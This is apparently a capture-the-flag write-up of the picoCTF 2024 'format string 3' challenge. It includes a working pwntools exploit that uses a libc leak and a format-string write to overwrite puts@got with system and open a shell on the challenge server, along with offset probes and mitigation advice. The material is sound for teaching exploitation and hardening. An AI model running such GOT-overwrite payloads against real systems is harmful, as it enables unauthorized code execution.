format string 3 picoCTF 2024 Solution

Published: April 3, 2024

Description

Can you overwrite a GOT entry through a format string vulnerability and pop a shell?

Download the binary, source (format-string-3.c), and the matching libc.so.6.

Verify protections: NX is on, PIE is off (the binary's GOT is at a fixed address). ASLR randomizes libc per run.

Install pwntools.

bash
wget https://artifacts.picoctf.net/c/518/format-string-3
wget https://artifacts.picoctf.net/c/518/format-string-3.c
wget https://artifacts.picoctf.net/c/518/libc.so.6
chmod +x format-string-3
checksec --file=./format-string-3
pip install pwntools

Solution

  1. Step 1
    Read the source: there is no win function
    Observation
    I noticed the challenge binary shipped with source (format-string-3.c) and that no win() or get_shell() function appeared in the source or in the binary's symbol table (checksec reports only the protections, so check symbols with objdump or nm). That suggested the solution required redirecting an existing libc call rather than jumping to a planted helper.
    The vulnerability is the classic printf(buf) on user input. The binary leaks &setvbuf so you can compute the libc base. There is no win(); you need to redirect an existing function call to system(). The puts(normal_string) at the end of main, where normal_string is the global "/bin/sh", is the obvious target.
    bash
    cat format-string-3.c
    Learn more

    Why puts("/bin/sh") is the gift. The author left a global string normal_string = "/bin/sh" and a final puts(normal_string) call. If you can change what puts does, that final line becomes system("/bin/sh") and you have a shell. Changing what puts does means overwriting its GOT entry.

    The Global Offset Table (GOT). Dynamically linked binaries call libc functions through a GOT entry: call puts in the binary goes to a PLT stub that does jmp [puts@got.plt], where puts@got.plt is a writable pointer that the dynamic linker fills in at first use. Overwrite that pointer so it points at system, and every subsequent puts call becomes a call to system().
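
    The indirection can be modelled in a few lines of Python. This is a toy analogy only: a dict stands in for the GOT, and the functions fake_puts, fake_system, and call_via_plt are hypothetical names invented for the illustration. It shows why replacing one pointer is enough to change what a later call does.

```python
# Toy model only: a dict stands in for the GOT, and Python callables stand in
# for libc functions. Real binaries do this with raw pointers in memory.

def fake_puts(s):
    return f"puts printed: {s}"

def fake_system(cmd):
    return f"system ran: {cmd}"

# The "dynamic linker" fills in the table entry for puts.
got = {"puts": fake_puts}

def call_via_plt(name, arg):
    """Model of a PLT stub: read the current pointer, then jump to it."""
    return got[name](arg)

before = call_via_plt("puts", "/bin/sh")

# The exploit's write primitive replaces the pointer and nothing else.
got["puts"] = fake_system
after = call_via_plt("puts", "/bin/sh")

print(before)
print(after)
```

    The call site never changes; only the table entry does, which is exactly what the format-string write targets.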

    What you have to leak. The GOT entry for puts lives in the binary at a fixed address (PIE is off; 0x404018 in this build). system lives in libc at a random address (ASLR is on). The challenge binary leaks &setvbuf for free, and inside any one libc image the offset between setvbuf and system is constant. So libc_base = leaked_setvbuf - libc.symbols['setvbuf'], then system_addr = libc_base + libc.symbols['system']. See ASLR / PIE bypass for CTF for the wider pattern.
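
    The arithmetic can be sketched without pwntools. The offsets and the leaked address below are made-up values for illustration, not the ones from the challenge libc; in a real run they come from libc.symbols and from the binary's leak.

```python
def resolve_system(leaked_setvbuf, setvbuf_offset, system_offset):
    """Return (libc_base, system_addr) from one leaked libc pointer."""
    libc_base = leaked_setvbuf - setvbuf_offset
    system_addr = libc_base + system_offset
    return libc_base, system_addr

# Hypothetical values, chosen only so the arithmetic is easy to follow.
SETVBUF_OFFSET = 0x7A3F0      # assumed offset of setvbuf inside libc
SYSTEM_OFFSET = 0x4F760       # assumed offset of system inside libc
leak = 0x7F1234A7A3F0         # assumed runtime address printed by the binary

base, system_addr = resolve_system(leak, SETVBUF_OFFSET, SYSTEM_OFFSET)
print(hex(base), hex(system_addr))
```

    With pwntools, setting libc.address to the computed base performs the second addition for you on every later libc.symbols lookup.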

  2. Step 2
    Find the format-string offset and the GOT target
    Observation
    I noticed the vulnerable printf(buf) call uses user-supplied input directly as the format string, and that the input buffer lands on the stack; I needed the exact positional index (the 'offset') so that fmtstr_payload would target the correct stack slot when building the write payload.
    Run the binary with input AAAAAAAA.%1$p.%2$p.%3$p...%40$p and find the index whose value is 0x4141414141414141. That's the format-string offset to your buffer; for this build it's 38.
    bash
    python3 -c "print('AAAAAAAA' + '.'.join(f'%{i}\$p' for i in range(1, 41)))" | nc rhea.picoctf.net <PORT_FROM_INSTANCE>
    # In the output, find the field equal to 0x4141414141414141; its 1-based position N is your offset
    # Confirm locally: the output should include 0x4141414141414141
    echo -n 'AAAAAAAA%38$p' | ./format-string-3
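
    Counting fields by eye is error-prone, so the search can be scripted. The sketch below is a hypothetical helper (build_probe and find_offset are names made up here); it assumes the output has the same shape as the probe above, with the marker echoed first and the %p fields separated by dots.

```python
def build_probe(max_slot, marker=b"AAAAAAAA"):
    """Marker followed by %1$p.%2$p...%N$p, matching the manual probe."""
    fields = ".".join(f"%{i}$p" for i in range(1, max_slot + 1))
    return marker + fields.encode()

def find_offset(output, marker=b"AAAAAAAA"):
    """Return the 1-based slot whose %p value equals the marker, or None."""
    # %p prints the 8 marker bytes as one little-endian integer.
    wanted = hex(int.from_bytes(marker, "little"))
    text = output.decode(errors="replace")
    # Keep only what follows the echoed marker, up to the end of that line.
    body = text.partition(marker.decode())[2].splitlines()[0]
    for index, field in enumerate(body.split("."), start=1):
        if field == wanted:
            return index
    return None

# Simulated program output, not captured from the real binary.
sample = b"AAAAAAAA0x7ffc1.(nil).0x10.0xa.0x4141414141414141.0x2e\n"
print(find_offset(sample))
```

    Against the real service you would send build_probe(40) and pass the received line to find_offset.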
    What didn't work first

    Tried: Assume the offset is 38 without verifying and go straight to building the payload.

    The offset 38 is build-specific. A recompile, different glibc, or different optimization flags shifts the buffer's stack position and produces a different slot index. If the offset is wrong, fmtstr_payload emits writes targeting garbage addresses, the binary usually segfaults, and you never get a shell. Always derive the offset empirically against the exact binary provided.

    Tried: Use %p without a positional index (just chaining bare %p.%p.%p...) to find the offset.

    Bare %p advances printf's internal argument pointer sequentially, so the Nth %p reads slot N. This does show the values, but the count starts at slot 1 (RSI), so you still have to track which output position corresponds to which slot. Using %1$p through %40$p with explicit indices makes the mapping unambiguous and avoids miscounting when a slot is null, which glibc prints as (nil) rather than a hex value.

    Learn more

    Why 38 specifically. The 1024-byte buf sits on the stack inside main's frame. On x86-64, printf's first five positional slots come from the argument registers RSI, RDX, RCX, R8, and R9; from slot 6 onward it reads successive 8-byte words up the stack until it reaches your buffer. 38 is build-specific; on a slightly different layout (different optimization, different glibc) it can be 36, 40, or something else. Always re-derive it with the chain.
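
    The slot-to-location mapping can be written down directly. This is a minimal sketch assuming the System V AMD64 calling convention and integer-sized arguments only; slot_location is a hypothetical helper, and rsp means the stack pointer as it stands in main at the call to printf.

```python
# Slots 1-5 are the remaining integer argument registers (RDI holds the format).
REGISTER_SLOTS = ["rsi", "rdx", "rcx", "r8", "r9"]

def slot_location(n):
    """Describe where positional argument n (%n$p) is read from."""
    if n < 1:
        raise ValueError("positional arguments are 1-based")
    if n <= len(REGISTER_SLOTS):
        return REGISTER_SLOTS[n - 1]
    # Slot 6 is the first stack word; each later slot is 8 bytes higher.
    return f"rsp+{8 * (n - 6):#x}"

for slot in (1, 5, 6, 38):
    print(slot, slot_location(slot))
```

    Under these assumptions an offset of 38 places the start of buf 0x100 bytes above the stack pointer at the call, which is why anything that changes main's frame layout changes the offset.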

    Pwntools FmtStr can automate the offset hunt. If you give it a callable that sends one payload and returns the response, FmtStr probes successive offsets until it finds the one that reflects its marker. For this challenge the manual chain is faster; for messier formats, FmtStr followed by fmtstr_payload is the standard combo.

    Find the GOT entry. readelf -r format-string-3 | grep puts or pwntools' elf.got['puts']. PIE is off, so the address is fixed at runtime.

  3. Step 3
    Build the GOT-overwrite with fmtstr_payload
    Observation
    I noticed the binary leaks &setvbuf before reading input and that PIE is disabled (puts@got is at a fixed address), which meant I could compute system's runtime address from the leak and use fmtstr_payload to overwrite puts@got so the final puts(normal_string) call would become system("/bin/sh").
    Compute libc_base from the leaked setvbuf, then system_addr = libc_base + libc.symbols['system'], then send fmtstr_payload(38, {elf.got['puts']: system_addr}). When main then reaches puts(normal_string), it calls system("/bin/sh") instead.
    python
    python3 - <<'PY'
    from pwn import *
    
    exe = './format-string-3'
    elf = context.binary = ELF(exe)
    libc = ELF('./libc.so.6')
    
    # io = process(exe)              # local testing
    io = remote('rhea.picoctf.net', 0)  # replace 0 with <PORT_FROM_INSTANCE>
    
    # 1. Eat the leak
    io.recvuntil(b'setvbuf in libc: ')
    setvbuf_leaked = int(io.recvline().strip(), 16)
    libc.address = setvbuf_leaked - libc.symbols['setvbuf']
    log.info(f'libc base: {hex(libc.address)}')
    log.info(f'system:    {hex(libc.symbols["system"])}')
    log.info(f'puts@got:  {hex(elf.got["puts"])}')
    
    # 2. Build and send the GOT overwrite
    payload = fmtstr_payload(38, {elf.got['puts']: libc.symbols['system']})
    io.sendline(payload)
    
    # 3. main now calls puts(normal_string), which resolves to system("/bin/sh")
    io.interactive()
    PY
    bash
    # inside the shell:
    ls / && cat /flag.txt

    Expected output

    picoCTF{...}
    What didn't work first

    Tried: Use the libc on the local machine instead of the provided libc.so.6 to compute system's offset.

    libc symbol offsets differ between versions - setvbuf and system are at completely different relative distances in Ubuntu 22.04's libc versus 20.04's. Using the wrong libc gives a plausible-looking system_addr that points into garbage memory, the GOT overwrite lands on a non-function address, and puts crashes instead of spawning a shell. Always load the exact libc.so.6 artifact from the challenge download.
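
    A cheap guard against a mismatched libc is to check that the computed base is page-aligned, since shared libraries are mapped on page boundaries. The sketch below uses a hypothetical helper name and made-up addresses; a wrong libc can still pass by coincidence, so treat a failure as a strong hint rather than treating a pass as proof.

```python
PAGE_SIZE = 0x1000  # 4 KiB pages, the usual x86-64 Linux default

def plausible_libc_base(leaked_addr, symbol_offset):
    """True if leaked_addr - symbol_offset lands on a page boundary."""
    base = leaked_addr - symbol_offset
    return base > 0 and base % PAGE_SIZE == 0

leak = 0x7F1234A7A3F0            # assumed leak, for illustration only
right_offset = 0x7A3F0           # assumed setvbuf offset in the matching libc
wrong_offset = 0x84CE0           # assumed setvbuf offset in some other libc

print(plausible_libc_base(leak, right_offset))
print(plausible_libc_base(leak, wrong_offset))
```

    In the exploit script the same check is a one-line assert on libc.address right after it is assigned.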

    Tried: Overwrite the GOT entry for setvbuf or printf rather than puts.

    setvbuf is called only during setup, before your input is read, so overwriting its entry has no effect after that point. printf is the vulnerable call itself: the GOT is consulted only when a call goes through the PLT, so rewriting printf's entry does not affect the call already in progress, and the call that follows the format string is puts, not printf. puts is the correct target because it is called after your format-string payload is processed, with the convenient argument normal_string = "/bin/sh" already in RDI.

    Learn more

    How fmtstr_payload assembles the write. A 64-bit address is 8 bytes. %n stores the number of characters printed so far, so writing the whole pointer in one shot would mean printing as many characters as the address value itself (on the order of 2^47 for a typical libc address), which is infeasible. Pwntools instead splits the value into smaller pieces, such as four %hn (2-byte) writes or eight %hhn (1-byte) writes, sequenced by %c padding directives that bring the running output length to exactly the value needed at each step. The target addresses are appended at the end of the payload and referenced through the offset you supplied. Format strings for CTF walks the byte-by-byte construction in detail.
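
    The splitting and padding logic can be sketched as follows. This is a simplified model written for illustration, not pwntools' actual algorithm: plan_hn_writes is a hypothetical helper, the system address is made up, and the model ignores the characters a real payload prints before the first write.

```python
def plan_hn_writes(target, value):
    """Split a 64-bit value into four 16-bit writes, smallest value first.

    Returns (address, halfword, pad) tuples, where pad is how many extra
    characters to print before the %hn that writes halfword at address.
    """
    chunks = [(target + 2 * i, (value >> (16 * i)) & 0xFFFF) for i in range(4)]
    # The printed-character count only grows, so write in ascending order.
    chunks.sort(key=lambda chunk: chunk[1])
    plan = []
    printed = 0
    for address, halfword in chunks:
        pad = halfword - printed  # non-negative because of the sort
        plan.append((address, halfword, pad))
        printed = halfword
    return plan

# 0x404018 is puts@got in this build; the system address is hypothetical.
plan = plan_hn_writes(0x404018, 0x7F123456789A)
for address, halfword, pad in plan:
    print(f"{address:#x} <- {halfword:#06x} after {pad} more chars")
```

    A pad of zero means no %c directive is emitted before that write. Sorting by value is what keeps every pad non-negative without relying on 16-bit wraparound.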

    Why this works without a win() function. The technique is called GOT overwrite or GOT poisoning. It promotes any future libc call into a hijack point. puts is the cleanest target here because (a) the binary explicitly calls puts(normal_string) with normal_string = "/bin/sh", and (b) system takes the same single-string-pointer signature. No argument shuffling needed.

    Why ASLR doesn't save the server. ASLR randomizes the libc base each time the program is executed, but the binary leaks &setvbuf from that exact same libc image before reading your input. Subtracting the static libc.symbols['setvbuf'] offset gives you the runtime libc base for this connection. Any other libc symbol (like system) is then a fixed offset away.

    Hardenings that would have killed this. Full RELRO (linking with -Wl,-z,relro,-z,now) marks the GOT read-only once the dynamic linker has resolved every symbol at startup, which breaks the overwrite primitive. Compiling with optimization and -D_FORTIFY_SOURCE=2 redirects printf to __printf_chk, which aborts when a format string held in writable memory contains %n. Each is a small build-flag change. See Buffer overflow exploitation for CTF for the broader hardening table.

Flag

picoCTF{G07_G07?_...}

There is no win() in this binary. The win move is GOT poisoning: leak libc via &setvbuf, compute system, and use fmtstr_payload to point puts@got at system. The trailing puts("/bin/sh") in main becomes system("/bin/sh") and you read /flag.txt from the shell.

Key takeaway

GOT overwrite (or GOT poisoning) redirects execution by corrupting the writable table of function pointers that the dynamic linker fills in to resolve libc calls. When a binary has no explicit win function, any libc call made after your write with a useful argument becomes a hijack target; puts("/bin/sh") turning into system("/bin/sh") is the textbook case. Full RELRO closes this class of attack by marking the GOT read-only after startup, and FORTIFY_SOURCE rejects %n in writable format strings, so both hardenings are worth enabling in every production build.
